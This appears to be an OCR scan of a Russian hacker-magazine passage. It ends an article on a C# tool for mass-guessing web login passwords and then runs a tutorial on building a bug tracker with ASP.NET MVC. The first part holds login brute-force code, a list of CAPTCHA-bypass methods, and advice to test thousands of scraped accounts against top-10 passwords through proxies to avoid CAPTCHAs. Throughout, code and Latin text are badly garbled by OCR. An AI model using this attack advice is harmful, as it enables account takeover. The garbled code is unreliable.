хакер выбирает его тип или полностью отказы- 
вается от его использования, установив галочку 
напротив поля «N 0 :». Рассмотрим один из вари- 
антов реализации кнопки загрузки данных: 

ѵаг ореп^ііе = пеы 0репРі1еРіа1оа() : 
і± Горепіііе .БНомРіаІодО == <-> 
0іа1оёКе5и1і:*0К) { 

. <31оЬа1.Мат е5.С1еа г () : 

СІоЬаІ.Матев . ДсІсІКапее(Рі1е.4-і 

КеасІАІ1І_іпе5(орепРі1е. РіІеМате)); 
(ЗІоЬаІ .Соип'Шатез = СІоЬаІ. МатеБ.ч-' 
Соипі: ^ 

} 1- I 

Далее располагается окно статистики для вы- 
вода состояния работы программы, чуть ниже 
хакер устанавливает число рабочих потоков 
и, самое главное, вводит данные для РОЗТ- 
запроса. Получает он их все из тех же Вигр ЗиЛе 
( рогізѵѵісіаег.пеѴЬцгр ) или плагинов для бра- 
узера. Основная сложность в подобных про- 



граммах — правильное управление потоками, 
их остановка и повторный запуск в случае не- 
обходимости. Не рекомендуется использовать 
АЬоіі, лучше выставлять флаг, который должен 
проверяться при запуске каждого потока, и если 
флаг выставлен, то он завершает свою работу {не 
мгновенно). Несмотря на то что такое «правопи- 
сание» явно на любителя, в хакерских кругах оно 
встречается довольно часто. 

НІібрКеБропзе гезропзе = 

Р о5Іі( 5 1оЬа1.Ро5'Ы. СІоЬаІ . Ро 5.1:2 + 

и5ег№те + СІоЬаІ . Р 056 З + изегРаББіл/ + <-■ 
СІоЬаІ . Ро5і:4) ; 

Іі_(ге5роп5е 1 - пиіі && гезропзе.*^ 

Соокіез . Соп±аіп5Кеу(С1оЬа1.Ро5'ЬСоакіе) ) { 
ге^игп "Тгие"; 

} еізе { 

ге1:игп "Раізе": 

} 



-Еог (іпі: і - і < СІоЬ аІ. <-■ 

боосШате . Соипі : І+ + 1 ) { 

'Ьех'ЬВох'Ье5'С.Іпѵоке(пеіл/ АсЬіоп(() =>«-< 
{ ^ех'ЬВох'ЬезІ: .Тех* += СІоЬаІ. «-< 

боосІМате і ( + " Р аззыогсІ :" + <-■ 

СІоЬаІ .СоосІРаззі ( + Епѵігоптеп1:.«-‘ 
ІМеіл/Ипе; })); 

/ / Муз ы ка на лю б ителя : ) 

РІаѵМизіс ( "Ріаѵ " ) ; 

1 

// П рисваиваем счетчику размер массива 

// СооР И а те 

аіезѣ =_ СІоЬаІ .СоосМате.Соипѣ.; 

В листинге выше программа выполняет за- 
прос с указанными ранее данными и в случае 
наличия требуемой куки в ответе записывает 
результат в Тгие. Ничего не напоминает? Это все 
тот же принцип «раз-два-три», не все хакеры лю- 
бят считать до четырех и более :). Следующий 
блок кода проверяет число поступивших на вход 
правильных комбинаций логин/пароль в массиве 
Аггау и, если их обнаруживает, выводит содержи- 
мое на центральную консоль. Іпѵоке используется 
для правильной работы, когда несколько потоков 
одновременно возвращают Тгие. 

САРТСНА 

Капча (САРТСНА, СотрІеТеіу АиТотаТесІ РиЫіс 
Тигіпд іезі Іо іеІІ Сотриіегз апб НитапБ Арагі) — 
полностью автоматизированный публичный тест 
Тьюринга для различения компьютеров и людей. 



Иногда настолько сложный, что даже человек 
не может дать правильный ответ с первой по- 
пытки. Внедряется капча в формы авторизации, 
отправки сообщения и подобное, чем защищает 
информационный ресурс от спама и беспрепят- 
ственного перебора паролей. Капча огорчает 
хакеров, поэтому за годы ее существования они 
разработали следующие методы ее преодоления: 

• использование уязвимостей (поиск ошибок 
веб - программ иста ) ; 

• угадывание (авось повезет! ); 

• использование баз данных (если капча гене- 
рировалась человеком, количество вариантов 
ограничено); 

■ распознавание чужими руками (~0,0013 дол- 
лара за одну капчу); 

■ автоматическое распознавание (использова- 
ние ОСП — ОрбсаІ СЬагасІег Ресодпійоп), 

Бывают еще и аудио капчи, часть реализаций 
из которых вполне успешно «решили» исследова- 
тели из Стэнфордского университета, Тулейнско- 
го университета и французского института ІЫВ1А, 
разработав систему РеСАРТСНА (еІесарІсЬа.пеб . 
С картинками работает РѴѴШсЬа { саса.гоу.огу/ 
мкі/РШіеИа), один из самых популярных ресур- 
сов, и четыре проекта на СосІеРго]ес{ (можно на- 
гуглить самостоятельно). 

Некоторые хакеры приноровились использо- 
вать возможность подключать модули из программ 
распознавания текста (РіпеНеаРег) в свои проекты. 

Не всегда капча является проблемой — часто 
ее не требуется вводить при первой авторизации 
(социальные сети, почтовые сервисы), она акти- 
вируется только после неудачной попытки входа. 
Поэтому сейчас в моде проверять тысячи учетных 
записей (собранных парсером) на ТОР-Ю паро- 
лей с использованием прокси. Таким образом 
хакер не встречает капчу и собирает урожай, при- 
ложив минимум усилий, 

ЗАКЛЮЧЕНИЕ 

В этой статье мы рассмотрели пример програм- 
мы для массового восстановления паролей своих 
друзей и просто знакомых (с их письменного со- 
гласия), реализованной на С#. Примечательная 
особенность разобранного примера в его универ- 
сальности, нет необходимости компилировать 
программу для каждого ресурса в отдельности. 
Следует также учитывать и что возможности ис- 
пользования подобных программ хакерами на- 
прямую зависят от настроек безопасности про- 
веряемого сервиса. 31 
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Технология АЗР.ЫЕТ уже давно перестала быть не- 
поворотливым монстром и уделом унылых корпора- 
тивных приложений. Заряженная МѴС-фреймворком, 
платформа АЗР.МЕТ превращается в грозное оружие, 
нацеленное на хайлоад и действительно большие 
проекты. Ну а мы что? Мы в стороне не останемся 
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ЧТО МНЕ ПОНРАВИЛОСЬ В Д8Р.ИЕТ МѴС 

Моя основная работа никогда не была напрямую связана с веб-разработкой. 
Все проекты создавались в свободное время и на технологиях, которые 
были мне симпатичны. Изначально я остановил выбор (как и многие) на РНР. 
Я долго на нем писал код, постоянно закрывая глаза на его странности 
и проблемы. Мне нравились многие РНР-фреймворки (Коііапа, Сосіеідпііег, 
РиеІРНР и другие), и я с удовольствием применял их в своих проектах. Одна- 
ко, несмотря на плюсы и многообразие готовых каркасов, мне всегда хоте- 
лось переметнуться в другой лагерь и посмотреть, как происходит разработ- 
ка аналогичных вещей там. Сначала я присматривался к популярному НиЬу 
с его рельсами, но потом все же решил остановиться на .МЕТ. Перечислять 
плюсы данной платформы можно долго, но наиболее значимыми для меня 
все же стали: 

1 . Надежность. Моя карьера разработчика началась с языка программиро- 
вания на Оеірбі. Строгая типизация, ООП, компиляция — все эти вещи 
прочно укоренились в моей голове. Мне нравится, когда я могу пред- 
сказать результат выполнения кода, а если допущу ошибку, то меня под- 
страхует компилятор. Если код пахнет откровенной тухлятиной, то компи- 
лятор обязательно сообщит об этом и разработчик сможет предпринять 
необходимые действия. Разрабатывая приложение под АЗР.МЕТ, я по- 
падаю в ту же самую среду, где в моем распоряжении предсказуемый 
и строго типизированный язык (С#) с подушкой безопасности в лице 
компилятора. 

2. Инструменты. ѴізиаІ Збисііо — прекрасная ЮЕ, а вкупе с такими штуками, 
как ВеЗНагрег, и вовсе превращается в настоящий комбайн для разра- 
ботчиков. Все необходимое собрано под одной оболочкой: полноценный 
отладчик, средства для рефакторинга, ІпЮІІіЗепзе, оснастки для связи 
со вспомогательными технологиями и многое другое. Все компоненты 
работают шустро и мотивируют на плодотворную работу. 

3. Полная документация. Технические документы по технологиям МісгозоТС 
оперативно обновляются и содержат массу полезной информации, начи- 
ная от теории и заканчивая полноценными примерами. Я уже не говорю 
о ежегодных подборках бесплатных тренингов в виде скринкастов и дру- 
гих плюшек вроде сильного и отзывчивого комьюнити. 

4. Производительность. Сравнивать производительность двух похожих тех- 
нологий всегда интересно, на зачастую такие сравнения не совсем объ- 
ективны. В больших проектах и при командной разработке АЗР.МЕТ по- 
казывает класс и оставляет далеко позади многих оппонентов. Скорость 
исполнения кода благодаря компиляции во многих случаях выше, чем 
в интерпретируемых языках. 

5. Безопасность. Не буду говорить, что это ключевое требование для каж- 
дого современного проекта. В АЗР.МЕТ все нацелено на создание без- 
опасного кода. С одной стороны тебя страхует компилятор (от «детских 
болезней»), а с другой — всевозможные библиотеки и готовые механиз- 
мы (например, безопасная система аутентификации). 

6. Расширяемость. Когда выходишь за рамки типовых проектов, всегда 
возникает задача расширяемости. Если библиотека/технология не под- 
держивает возможность масштабирования, то нужно трижды подумать 
перед тем, как начать строить на ее основе долгоиграющий проект. Ре- 
ализация МѴС-фреймворка от МісгозоТС достаточно хорошо продумана, 
и проблемы с наращиванием функционала вряд ли возникнут. Разработ- 
чик всегда может написать реализацию отдельного компонента системы, 
тем самым снабдив его необходимым функционалом. 

7. Хозяин своему коду. Я люблю полностью контролировать свой код, и мне 
дико не нравится, когда система генерит его без моего ведома. В класси- 
ческом АЗР.МЕТ одной из проблем всегда была бесконтрольная верстка. 




Бутстрапимтему 

Платформа так и норовила сформировать невалидный код разметки, ко- 
торый трудно переделать под себя. В АЗР.МЕТ МѴС такая проблема от- 
сутствует напрочь. Здесь программист сам командует парадом. 

МООЕІ.ѴІЕѴѴСОІІТПОЫ.ЕП 

На страницах нашего журнала я уже несколько раз рассматривал архитектур- 
ный паттерн МѴС (модель, представление, контроллер). В одном из номеров 
я даже приводил пример разработки простейшего МѴС-фреймворка на РНР. 
Паттерн МѴС условно делит архитектуру приложения на три компонента: 

■ модель {тобеі) — определяет основные сущности приложения. Звучит 
заумно, но под этой фразой всего лишь подразумеваются алгоритмы/ 
классы, необходимые для доступа к данным. Например, мы собираемся 
делать многопользовательское приложение. Класс, описывающий объект 
пользователя, будет моделью; 

• представление (ѵіеѵѵ) — визуализация моделей. На примере веб- 
приложений это будет НТМІ,- верстка; 

• контроллер (сопігоііег) — отвечает за обработку поступающих запросов. 

Главная цель МѴС — обеспечить разделение ответственности между ос- 
новными компонентами приложения. Контроллер не должен знать нюансы 
формирования верстки или хранения данных в БД, он выполняет лишь роль 
проводника. Пользователь попросил, а контрол нашел правильный путь, 
не задумываясь о том, что там может произойти. 

БАГТРЕКЕР 

Типичный пример при знакомстве с подобными фреймворками — создание 
еще одного движка для блога. Я сначала хотел пойти тем же путем, но в итоге 
решил придумать более полезное приложение. Так родилась идея проверить 
фреймворк на создании проекта «Багтрекер». Такие приложения наиболее 
востребованы в компаниях, где более-менее налажен процесс разработки, 
и совсем скоро ты убедишься, что сотворить нечто подобное на АЗР.МЕТ МѴС 
проще простого. 



СТОИТ ЛИ ИЗУЧАТЬ КЛАССИЧЕСКИЙ АЗР.ИЕТ? 



Простота МѴС-фреймворка для АЗР.МЕТ может 
легко создать ошибочное мнение. Мол, к чему 
этот «неповоротливый» АЗР.МЕТ с его «стран- 
ной» разметкой, мне хватит и АЗР.МЕТ МѴС. 
Однако не стоит забывать, что МѴС — это всего 
лишь архитектурный паттерн и его можно реа- 
лизовать самостоятельно на любом языке. Тут 
ситуация аналогична миру РНР С момента по- 
явления МѴС-фреймворков язык получил вто- 
рое дыхание и сумел привлечь новых поклон- 
ников. Почему? Порог вхождения в и без того 



простой язык программирования снизился. 
Многие вещи стали доступны из коробки. 
В мире АЗР.МЕТ произошла аналогичная ситуа- 
ция. МѴС-фреймворк от МісгозоД существенно 
понизил барьер вхождения в технологию АЗР. 
МЕТ Правда, это не говорит, что без фрейм- 
ворка платформа никуда не годится. Просто 
запомни, что он — это лишь очередной слой, 
скрывающий от твоего взора ряд нюансов 
классического АЗР.МЕТ. Имея достаточный 
уровень подготовки, ты без проблем можешь 



сделать свою реализацию МѴС-фреймворка 
под платформу АЗР.МЕТ. Он тоже сможет «в три 
пятнадцать» делать красивые урлы и осущест- 
влять контроль над генерируемой разметкой. 
К чему это я все говорю? А к тому, что техноло- 
гия АЗР.МЕТ намного шире, чем просто АЗР.МЕТ 
МѴС. Ее глубокому изучению однозначно стоит 
уделить время, и только тогда ты сможешь по- 
настоящему прочувствовать всю мощь плат- 
формы от МісгозоИ, которая так полюбилась 
в корпоративном сегменте. 



по 
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ЧТО ПОЧИТАТЬ 

до о.аІ/рѴхф, — прекрасный цикл статей Андрея Черникова. В статьях рас- 
сматривается процесс создания полноценного сайта. Мануал больше ори- 
ентирован на читателей, имеющих опыт разработки на АЗР.ЫЕТ МѴС. 
доо.дІ.'УрГ/Х — книга «АЗР.ЫЕТ МѴСЗ Ргатеѵѵогк с примерами на С# для 
профессионалов». Книга немного устарела (беда русских изданий), но все 
же до сих пор актуальна и новичкам будет в самый раз. 
сюо.дІ/і5Т4г — книга «АЗР.МЕТ МѴС4. Разработка реальных веб-приложений 
с помощью АЗР.МЕТ МѴС». В отличие от предыдущей рассматривается све- 
жая версия МѴС-фреймворка, но материал больше подойдет для тех, кто 
уже немного в теме. 

ТесИсІаѵз.ги — на сайте представлено огромное количество докладов по 
технологиям и продуктам компании МісгозоГІ. Рекомендую обратить вни- 
мание на тренинги по АЗР.МЕТ МѴС от Гайдара Магданурова. 



Теперь давай определимся с функционалом будущего про- 
екта. Будущий багтрекер должен: 

• отображать список тикетов с возможностью быстрой филь- 
трации по их состоянию (открыто/закрыто); 

• обладать простым интерфейсом, упрощающим процесс до- 
бавления задач в базу; 

• производить приятное впечатление на пользователя. 

С первыми двумя пунктами все ясно — немного кода на С#, 
и все готово, но как быть с интерфейсом? Мы воспользуемся 
фреймворком ТѵѵіТТег Вооізігар (см. статью про него в 168-м 
номере нашего журнала), который позволит нам состряпать 
симпатичный интерфейс для приложения за несколько минут. 

Я не стану приводить портянку из пары десятков килобайт ша- 
блонного НТМЕ-кода (тем более что там нет ничего необычно- 
го), а просто дам ссылку на заготовку: аоо.аІ/ХѵИзтІт . Качай 
и повторяй действия вместе со мной. 

ДЕЛАЕМ ПРОЕКТ 

У меня нет профессиональной версии студии, поэтому я вос- 
пользовался экспресс-версией редакции «Для ѵѵеЬ». Запускай 
студию и создавай новый проект «Веб-приложение АЗР.МЕТ 4» 
с гордым названием ВидТгаскегРогХ. 

В окне мастера создания нового проекта тебе будет предло- 
жено выбрать шаблон для приложения. Шаблоны позволяют сразу же снаб- 
дить будущее творение определенным функционалом. Например, выбрав 
шаблон «Интернет-приложение», ты получишь заготовку с регистрационной 
формой и механизмом аутентификации. 

Для своего проекта мы выберем вариант «Простой». Такой проект не бу- 
дет включать в себя ничего лишнего, и это будет в самый раз для первого 
знакомства с миром АЗР.МЕТ МѴС. В окне выбора шаблона для приложения 
также обрати внимание на пункт Ѵіеѵѵ Епдіпе. Здесь выбирается шаблониза- 
тор для представлений. Тебе доступно два варианта: Вагог и АЗРХ. 

Во второй версии фреймворка МѴС в качестве шаблонизатора использо- 
вался АЗРХ, пришедший из классического АЗР.МЕТ. После РНР'ного много- 
образия движков для рендеринга представлений начинаешь испытывать 
приступы тошноты от его неуклюжести. Лучше сразу выбирать Рагог, мак- 
симально приближенный к аналогичным РНР-решениям (Зтагіу, Тѵѵід и так 
далее). 

Больше никаких галок ставить не нужно, жми ОК, и студия сгенерирует 
болванку приложения. 

СТРУКТУРА МѴС-ПРИ ЛОЖЕН ИЯ 

Открой окно Зоіийоп Ехріогег пошире и мотай на ус теорию. 

• Арр_Раіа. После создания приложения эта директория пуста, но впо- 
следствии в ней будут храниться различные ресурсы приложения, такие 
как базы данных. 

• Арр 8іаіТ. В директории принято хранить статичные классы, отвечающие 
за общую конфигурацию приложения. В предыдущих версиях фреймвор- 
ка классы, влияющие на конфигурацию приложения, описывались в еди- 
ном файле ОІоЬаІ.азах. Начиная с четвертой версии, принято их разде- 
лять на отдельные файлы и помещать в АррЗТагТ с кодом инициализации 
в СІоЬаІ.азах. 

• Сопіепі. Статичные ресурсы приложения. Сюда можно помещать изо- 
бражения, файлы стилей и много чего другого. 

• СопІгоІІегз. Из названия сразу понятно, что здесь должны храниться все 
контроллеры. 

• Могіеіз. Содержит описание моделей приложения. 



• Зсгіріз. Здесь должны находиться различные вспомогательные библи- 
отеки. Как правило, это иаѵаЗсгірТ-тулзы вроде АпдиІаі^З или )Оиегу. 
При создании приложения по шаблону «Простой» в эту папку автомати- 
чески добавляется ряд библиотек: іОиегу, іОиегу III, кпоскоиі, тобегпігг 
и другие. 

• Ѵіеѵѵз. Название директории опять подсказывает тип содержимого. Все 
представления группируются по принадлежности к контроллерам. Напри- 
мер, все представления, относящиеся к контроллеру Ноте, будут разме- 
щаться по пути Ѵіеѵѵз/Ноте/. 

• СіоЬаІ.агах — о предназначении этого файла я упоминал, когда расска- 
зывал про директорию Арр_81агТ. Напоминаю еще раз: в файле определя- 
ется код инициализации проекта. 

• ѴѴеЬ.сопІід — основной файл конфигурации приложения. Например, 
здесь описываются настройки соединения с СУБД; настройки вспомога- 
тельных компонентов (таких как ЕпШу Ргатеѵѵогк). 

ВЫЖИГАЕМ МОДЕЛИ 

Начинать разработку приложения будем с проектирования моделей. Для соз- 
дания багтрекера нам потребуется описать несколько моделей: 

• тикет (Тіскеі) — сущность, характеризующая отдельную заявку (пост 
в багтрекер), Ряд полей этой модели будет ссылаться на другие модели; 

• статус (ЗТаТиз) — - статус выполнения заявки; 

• категория (СаТедогу) — категория заявки; 

■ пользователь (ІІзег) — пользователь, оставивший тикет. 

Каждая модель в АЗР.МЕТ МѴС фреймворке описывается в виде отдель- 
ного класса в папке МобеІ (можно в любом месте). Добавление новых моде- 
лей выполняется в контекстном меню с помощью пункта АсІсІ — *■ СІазз. Создай 
все модели (см. соответствующие листинги) и возвращайся к тексту статьи. 

Листинг 1. Описание модели Са^е^огу 

риЬІіс сіазз СаТе^огу 

.{ 

риЬІіс ігѵЬ С а1:е%ог уІс1 { §е~Е: зе1:;_} 
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Дизайним схему таблицы 



риЬІіс 5І: гіпе Т іііе { реі:: зе!:: } 

1 

Листинг 2. Описание модели 5~Еа±іі5 

риЬІіс СІЭ55 БІіаІіиБМосІеІ 

і 

риЬІіс іітЕ ЗіаЬиБІсІ { 5е1і; } 

риЫіс 5ігіп^ Тіііе { 5еі; } 

} 

Листинг 3. Описание модели ТіскеЬ 

риЫіс СІЭ55 ТіскеЬ 

{ 

риЫіс іпі ТіскеіІсІ { §еЫ зеТ; } 

риЬІіс 5~Ьгіпд Ті~Ые { ее~Ь: зеі; } 

риЬІі с зігіп^ ОезсгірТіоп { §еі; зеЬ; } 

риЬІіс ОаіеТіше Раііе { §еі:; зеі; } 
риЬІ іс іоі? Саіе§огуІсІ { §еі:; зеі; } 

риЬІіс ѵігЕиа ! Саіе§опу Са'Ье^огу { зеі; 5еЖ;_і 

риЬІіс іпі? 5ѣа1и5ІсІ { §е~Ь: зеі : } 

риЬІіс ѵіг~Ьиа1 5~Ьа1: и5 5 1: а іи 5 { ; 5 еі ^_} 

риЬІіс іпі ? Ызе гіЬ { ееі ; зеі: } 

риЫіс ѵі гіиаі Іізег Ызег { §еі; зеі; } 

Листинг 4. Описание модели ІІзег 

риЬІіс с Іа 55 Ызег 

і 

риЫіс іпі ЫзегІсІ { §еі;_ 5еі^_} 

риЫіс 5ігіп§ _Ріг5іМате { §[еі ; зеі ; } 

риЬІіс зігіп % ЬазіМате { §еі: 5еі: } 

риЬІіс зігіп§ Етаіі { §еі; зеі; } 

} . 

ПОДКЛЮЧАЕМ ЕІЧТІТѴ РВАМЕѴѴОПК 

Платформа ,N61 предоставляет нам несколько способов доступа к данным. 
Мы воспользуемся наиболее актуальным из них — ЕпШу Ргатеѵѵогк. Помимо 
типичных задач, возлагаемых на ОПМ (ОЬ]ес1 геіаііоп тарріпд) фреймворк, 
в ЕР реализована поддержка методики СосІеРігзі позволяющая девелоперу 
на этапе разработки не задумываться о дизайне схемы БД. Достаточно лишь 
описать модели, а вопросы создания базы и таблиц на себя возьмет сам 
фреймворк. Нельзя сказать, что такая схема будет готова к использованию 
в продакшне, однако при разработке приложения с нуля этот подход позво- 
лит существенно сэкономить время. 

Чтобы воспользоваться плюсами этого фреймворка, нам необходимо под- 
ключить его к своему проекту. Проще всего это сделать при помощи консоли 
управления пакетами МиѲеі Сразу после инсталляции ѴізиаІ ЗШбіо Іог ѴѴеЬ 
расширение Ыидеі Раскаде Мападег недоступно. Его требуется установить 
самостоятельно, воспользовавшись пунктом Ехіепзіопз апб Ырсіаіе в меню 
Зегѵісе. После установки запускай Ыиде! Раскаде Мападег Сопзоіе и вводи 
в ней команду для установки Епіііу Ргатеѵѵогк: ІпзіаІІ-Раскаде ЕпМуРгатеѵѵогк. 

Установив ЕпШу Ргатеѵѵогк, мы можем создать контекст данных для на- 
ших моделей и начать производить первые манипуляции с добавленными 



в БД записями. Под страшным словом «контекст» подразумевается создание 
класса наследника от ОЬСопІвхІ (Зузіет.РаІа.ЕпШу), который свяжет модели 
с таблицами базы данных. Создавай новый класс для контекста данных в ди- 
ректории Мосіеіз и переписывай в него код листинга 5. 

Листинг 5. Реализация класса контекста 
риЬІіс сіазз Ви§ТгаскегСопіехі : РЬСопіехі 

і 

риЬІіс РЬ5еі<Саіе^огѵ> Саіе^огіез { §еі; 5еі ; } 

риЬІіс 0Ь5еі<5іаіи5> Біаіизез { ^еі: зеі; } 

риЫіс 0Ь5еі<Тіскеі> Тіскеі5 { ёѳі;.^ зеі; } 
риЫіс 0Ь5еі<ІІзег> 11зеп5 { ^еі; зеі; } 

і 

После создания контекста мы можем воспользоваться технологией 
СосІеРігзі, то есть доверить ЕпШу Ргатеѵѵогк создание таблиц и полей. В своем 
примере я воспользуюсь именно этим способом, поскольку статья не резино- 
вая и тратить время на описание процесса создания схемы БД нет смысла. 
К тому же ничто не мешает тебе самостоятельно создать БД и познакомиться 
с подходом РаІаЬазеРігзІ: («сначала база, потом код»). 

В принципе, уже на данном этапе мы можем создать контроллер с пред- 
ставлениями, и ЕР любезно сгенерирует базу данных. Однако мы лучше сра- 
зу внесем небольшой твик в конфигурационный файл (ѴѴеЬ.сопЛд), тем са- 
мым принудительно задав имя базы. Найди в этом файле описание секции 
СоппесІіопЗігіпдз и удали из нее (если есть) все разделы. После добавь одну 
строку: 

< асісі пате="Ви§ІгаскегСопіехі" соппесііоп5ігіп§="0аіа 5оигсе=4-> 



( Іоса1ОВ)\ѵ11 ± 0;АііасЬОЬРі1епате= ' |0аіа0ігесіогу | \оигВазе. 
тсі-р' : Ігі е^г аіесІ 5есигііу=Тгие м р гоѵіс!егМате= І '5у5іет . Раіа 
БдІСІіепі" /> 



В этой строке я определил, что фреймворк должен использовать 
ВидТгаскегСопіехі для связи с БД, а саму базу будет хранить в файле оигВазе, 
тсК, расположенном в директории данных (Арр Оаіа) проекта. 
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СН1Ю-ПРИЛОЖЕНИЕ В ПАРУ КЛИКОВ 

Фактически наше приложение научилось работать с базой данных, но в реа- 
ле мы этого еще не увидели, поскольку ни разу не запускали наш багтрекер. 
Надо срочно исправлять положение дел, но у нас еще нет ни одного контрол- 
лера и представлений. Следовательно, запустив проект сейчас, хорошего мы 
ничего не увидим. Я предлагаю пока не заморачиваться на верстке представ- 
ления с подготовленным нами красивым интерфейсом. Лучше быстренько 
протестируем то, что есть, 

Создадим для этого простейший СПІІО (Сгеаіе геаб ирбаіе беіеіе) функ- 
ционал без единой строчки кода. Перейди в Зоіиііоп Ехріогег и добавь в папку 
СопІгоІІегз новый контроллер с именем СгисІСопІгоІІег. В окне создания ново- 
го контроллера не торопись кликать на пимпу с кнопкой ОК. В выпадающем 
поле Тетріаіе выбери МѴС сопігоііег ѵйііт геасі/ѵѵгібе асііопз апР ѵіеѵѵз, изіпд 
ЕпШу Ргатеѵѵогк. После этого станут доступны поля для выбора классов, опи- 
сывающих модель и контекст данных. Выбирай Тіскеі (в качестве модели) 
и ВидТгаскегСопІехІ (в качестве контекста). Остальные поля можешь оставить 
со значениями по умолчанию. 

Нажимай на ОК и восхищайся тем, как студия создала за нас код действий 
с необходимыми представлениями. Нам остается только запустить приложе- 
ние и проверить результат его выполнения. Сразу предупреждаю, после за- 
пуска ты увидишь не результат работы СРГІЮ, а ошибку «Ресурс не найден». 
Мы не прописали маршрут по умолчанию, поэтому, чтобы добраться до сге- 
нерированного контроллера, тебе потребуется вбить в адресной строке 
полный путь к нему: ІтІІр://ІосаІЬо5І:53532/сгисІ, Альтернативным решением 
будет внесение изменений в конфигурацию маршрута (файл РоиІеСопІід.сз): 

сІе-Ра иИз: пем { сопбгоііе г = "с гисі". 

асбіоп =_"Іпс1ех" л 

ісі = ІігІРагатебег .Орбіопаі } 

В этой строке я устанавливаю, что контроллером по умолчанию явля- 
ется сгисі (а не Ноте, как было изначально). Внеся изменения в маршрут, 
перезапусти приложение, и ты сразу попадешь в сгенерированный СВІЮ- 
интерфейс. 

Во время создания тикета ты увидишь, что фреймворк сгенерировал нам 
выпадающие списки для полей Саіедогу, Зіаіиз и ІІзег, но в этих списках нет 
ни одного элемента для выбора. Чтобы в них что-то появилось, нам нужно до- 
бавить данные в соответствующие таблицы. Прерви выполнение аппликации 
и через окно ОаІаЬазе Ехріогег открой соответствующие таблицы для внесе- 
ния данных. Я создал пару статусов в таблице Зіаіизез и парочку разделов 
в Саіедогіез, после этого выпадающие поля в представлении заполнились 
добавленными данными. 

КОНТРОЛЛЕРЫ 

СВІЮ- приложение получилось вполне рабочим, но для постоянного исполь- 
зования оно не годится. Уж больно «топорно» и нефункционально смотрится. 
У нас уже есть забутстрапенная заготовка верстки, и теперь остается ее на- 
тянуть на существующее приложение, а заодно познакомиться с самостоя- 
тельным созданием контроллеров и представлений. 

Добавь новый пустой контроллер к своему проекту и назови его 
НотеСопІгоІІег, ѴізиаІ Зіибіо сгенерирует каркас будущего контроллера 
и создаст действие ІпРех, Это действие будет выполняться во время обраще- 
ния к имени контроллера. Например, чтобы обратиться к нашему контролле- 
ру Ноте, нам требуется перейти по адресу: ІтІІр://!осаІі'Ю5І/[тоте. 

Пока ты переписываешь код контроллера, я расскажу тебе о реализации 
контроллеров в АЗР.МЕТ МѴС. Как ты уже понял из листинга, контроллер — 
это не что иное, как обычный класс, унаследованный от ЗузІет.ѴѴеЬ.Мѵс. 
Сопігоііег. При создании нового контроллера ты должен следовать некоторым 



соглашениям, главным из которых будет обязательное наличие постфикса 
Сопігоііег. Например, если ты хочешь создать контроллер Асітіпка, то в этом 
случае полное имя должно быть АсІтіпкаСопІгоІІег. 

Чтобы обратиться к созданному контроллеру (из браузера), необходимо 
написать в адресной строке полное имя контроллера и через слеш имя дей- 
ствия. Если требуется передать в контроллер какие-нибудь дополнительные 
параметры (например, методом Оеі), то их также следует указывать через 
слеш. Такой подход справедлив для маршрута, определенного по умолча- 
нию. Например, для передачи параметра 1 контроллеру АРтіпка следует 
пройти по пути: Мйр://ІосаІЬозІ/аРтіпка/1 . Обрати внимание, что в браузере 
указывать постфикс Сопігоііег не требуется. 

Листинг б. Код контроллера 

ргіѵаТе ВиеТгаскегСопТехб сІЬ = пем Ви^ТгаскегСоп’ІехІіО ; 

риЫіс АсТіопКезиІТ ІпсІех() { 

ѵап "ИскеТз^ = сІЬ . Тіскеѣз . Іпс1исІе(р => р. Саіедогу ) 

Іпс1исІе(р _=> р. БбаТшз) . Іпс1ибе(р _=> р^ІІзеп); 

геТигп Ѵіем(1:іске'І5 .То(Д5Т( 

} 

У тебя может возникнуть резонный вопрос: возможно ли как-то повлиять 
на установленные правила роутинга? Шаблон маршрута определен в клас- 
се ПоиІеСопІід, и ты волен им рулить как хочешь. Например: "ги{сопІгоІІег}/ 
{асІіоп}/(ісІ}" заставит добавлять к имени контроллера префикс ги. 

Хочется еще рассказать про маршруты, но, увы, объем статьи ограничен. 
Пора переходить к рассмотрению небольшого примера кода, демонстриру- 
ющего обработку внешних параметров в контроллере. Думаю, комментарии 
излишни: 

іпі. туРагатІ = Іп1:32. Рагзе^едиезТ: . Рагатз[ "туРагат" ] X; 

ДИЗАЙНИМ ПРЕДСТАВЛЕНИЕ 

Контроллер успешно принимает пользовательские запросы, и теперь пора 
сотворить для него представление. Добавить для контроллера новое пред- 
ставление проще всего посредством пункта АРР Ѵіеід/ контекстного меню, вы- 
зываемого при правом клике по имени действия контроллера. 

В АЗР.ЫЕТ МѴС принято выделять несколько типов представлений: 

• строго типизированные представления (мы должны гарантировать, 
что переданная модель будет заданного типа); 

• частичные представления (используются внутри других представлений); 

• мастер-страницы (представления, позволяющие задать шаблон форми- 
рования страниц). 

Теперь попробуем создать наше первое представление. Поскольку в на- 
шем приложении будет несколько повторяющихся элементов (например, 
общая разметка, сайдбар и так далее), мы можем пихать этот код в каждую 
вьюшку, но выгодней создать одну мастер -страницу, которая впоследствии 
будет использоваться при формировании других представлений. 

Мастер -стран и цы принято помещать в директориюЗбагеб. Для своего при- 
мера я определил одно представление и назвал его _ЬидТгаскегМаз1егРаде. 
сзітіті (содержит основную часть верстки). Приводить код вьюшки я не буду 
из-за ее объема, а лучше сразу рассмотрю используемые управляющие кон- 
струкции: 

• НІтІ.РагІіаІ("_1еИЗіс1еЬаг") — вызов частичного представления с именем 
"_ІеИЗісіегЬаІ". В одноименном файле я описал код верстки левого сайд- 
бара; 

• НепбегВосіуО — запускает рендеринг других представлений, созданных 
на основе данной мастер -стран и цы; 
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Добавление контроллера 




Имя контроллера: 

СгигіСогііюііег 

Параметры формирования шаблонов 
Шаблон: 

МѴС- контроля ер с действиями чтения и записи и представлениями, использующий ЕпйТу Ргагпеѵ/огк т 
Класс модели: 

Тгскеі: (ВидТгаскегРогХ.МоРеІз} ▼ 

Класс контекста данных: 

Ва дТ г аске Со ггіехі (Ву дТ гаскегГ огХ.М огіеіз) ▼ 



Представления; 
Шог (С5НГМІІ) 



Дополнительные 

■ 



Добавить Отмена 



Мастер настройки 
СНІЮ 



• игІ.СопІепД’У^огпе/сгеаіеЕпІгу") — хелпер формирует абсолютный путь к приложению; 

* Зсгіріз.ПепсіегС’аззеІзЛз/іриегу^з") — хелпер генерирует теги <зсгірі></зсірП;> и про- 
писывает в атрибут зге путь сценарию. 

Когда разберешься с используемыми управляющими конструкциями, становится ясно, 
что весь код представлений, созданный на основе мастер-страницы, будет включен на ме- 
сто вызова ВепбегВобуО. 

Чтобы остальные представления знали, на основе какой мастер-страницы им ренде- 
риться, мы должны указать на нее ссылку: 

и 

